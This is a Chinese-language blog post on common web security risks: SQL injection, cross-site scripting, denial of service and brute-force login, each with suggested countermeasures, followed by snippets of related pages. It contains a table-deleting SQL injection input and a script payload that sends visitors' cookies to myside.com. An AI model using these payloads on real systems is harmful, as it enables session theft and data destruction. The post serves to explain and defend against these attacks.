在平时的编程中,我们常常会忽略一些重要的安全隐患,今天整理如下:
1.SQL注入攻击
服务器端程序有时希望接受客户端输入并且将他作为查询的一部分
例如:一个接收用户名的登录界面可能执行以下代码:
sql=select * from users where username=?
如果客户端输入以下字符串作为用户名
a';delete from users;
sql=select * from users where username=a';delete from users;
如果这条语句被执行,那么users表中的数据就会被删除
对策:
1.禁止输入特殊字符,如百分号,单引号,双引号
2.禁止输入敏感字符,如update,insert,delete
3.对特殊字符进行转义
2、跨站脚本攻击
假设有个留言板,你输入如下文字:
<script>
document.location="http://myside.com/xx.jsp?cookies="+document.cookie
</script>
这相当于在留言板网站的源程序中加入了JavaScript代码。
当其他客户查看这条留言的时候,浏览器就会在后台把这个客户端浏览器的cookie发送到myside.com网站。
这个网站只要设置接收程序就可以通过cookies变量获得该客户的cookies信息
如果上述文字从数据库中取出来的,也会有同样的结果
对策:
1.在界面输入中,禁止输入脚本
2.在把数据存入数据库之前,以及从数据库取出数据后,进行html转义
3.拒绝攻击
1.上传非常大的数据或文件可以很快地填满数据库
2.短时间内上传大量数据或文件也可以填满数据库,使系统无法运转。
攻击者可以在短时间内用大量的下载访问请求来堵塞服务器,使之没有空闲处理合法客户的请求。
4.暴力攻击
假设一个登录页面。攻击者可以编写代码,简单地加入一个循环来尝试用不同的用户名/密码登录,获得合法客户身份
分享到:
相关推荐
WEB安全测试通常要考虑的测试点.txt
1、在项目设计阶段添加对安全的考虑 2、重点项目的设计,需要webtc介入安全审核 1、上线的JS代码必须进行YUI混合压缩,去掉注释 2、模板的注释信息不能出
这是一个安全架设服务器的电子书,有详细的步骤说明。
Windows NT系统出于安全性的考虑,设置了用户组和权限的划分,尤其在普通桌面版或者说家庭版的系统中体现的更为明显,服务器上经常对Administrator赋予了最高权限,有童鞋说,按照上面的方法,搭建完成服务器了以后...
第7章 Web的安全 7.1 Web安全概述 7.1.1 Internet的脆弱性 Web是建立在Internet上的典型服务,所以,Internet的安全是web安全的前提和基础。Internet的安全隐患主要表现在: (1)Internet的无边界性为黑客进行...
WebServices是进行数据访问的一种渠道,WebServices安全性规范分析与研究说明了在设时如何进行安全性考虑
数据库的安全应从事前预防和事后 追踪两个方面进行考虑。事前预防通常包括数据库安全模型、视图机制、数据加密、数 据库备份等方面,事后追踪通常从审计追踪、数据恢复等方面进行。 1.1数据库安全模型 通常数据库...
从威胁、对策、漏洞和攻击的角度分析了Web应用程序的安全。如果您在应用程序设计、实现和部署过程中考虑安全功能,将有助于更好地理解攻击者的思想。通过从攻击者的角度思考问题并了解他们可能采取的策略,您在应用...
Web开发框架的需要考虑的安全问题.pdf
从威胁、对策、漏洞和攻击的角度分析了Web应用程序的安全。如果您在应用程序设计、实现和部署过程中考虑安全功能,将有助于更好地理解攻击者的思想。通过从攻击者的角度思考问题并了解他们可能采取的策略,您在应用...
对于系统本身安全性,主要考虑服务器自身稳定性、健状性,增强自身抵抗能力,杜绝一切可能让黑客入侵的渠道,避免造成对系统的威胁。对重要商业应用,必须加上防火墙和数据加密技术加以保护。在数据加密方面,更重要...
安全漏洞 Web服务器上的漏洞可以从以下几方面考虑: 1.在Web服务器上你不让人访问的秘密文件、目录或重要数据。 2.从远程用户向服务器发送信息时,特别是信用卡之类东西时,中途遭不法分子非法拦截。 3.Web服务器...
这个特点要求每个设计人员必须全面考虑,要尽可能Web数据库系统安全性分析任务书全文共2页,当前为第2页。Web数据库系统安全性分析任务书全文共2页,当前为第2页。多地提出各种设计方案,在对多种设计方案进行比较中...
本页内容本模块内容目标适用范围如何使用本模块Web应用程序的体系结构和设计问题部署考虑输入验证身份验证授权配置管理敏感数据会话管理加密参数操作异常管理审核和记录设计指南小结总结其他资源本模块内容Web应用...
安全网关,Websense,Websense专家教你如何选购Web安全网关,由于越来越多的恶意攻击和数据泄漏都是利用Web发起,已经让更多的企业开始考虑或着手部署一款适合的We
由于越来越多的恶意攻击和数据泄漏都是利用Web发起,已经让更多的企业开始考虑或着手部署一款适合的Web安全网关,来帮助他们应对Web威胁,数据泄漏等日益严峻的安全问题。那么,什么样的Web安全网关才是企业真正需要...
渗透程度有深浅,要看Web服务器的安全程度。浅则窃取一些用户账号相关信息,深则获得管理员账号。最常用的渗透手段是SQL注入、XSS(跨站)、上传漏洞。这里只从防御的角度阐述。1.泄露敏感信息—攻击者可以获取后台...
目录 1. 介绍 5 1.1 项目概述 5 ...6.2 服务支持的考虑 64 6.2.1 安全 64 6.2.2 服务器管理 64 7. 实现环境视图 64 7.1 开发环境 64 7.2 测试环境 64 7.3 生产环境 65 7.3.1 网络 65 7.4 域信息 65
由我刚开始学习php的时候,discuz, ofstart 这些程序所有的程序都是存在放在web的根目录下。如ofstart和phpwind的require目录,存放了大量的库文件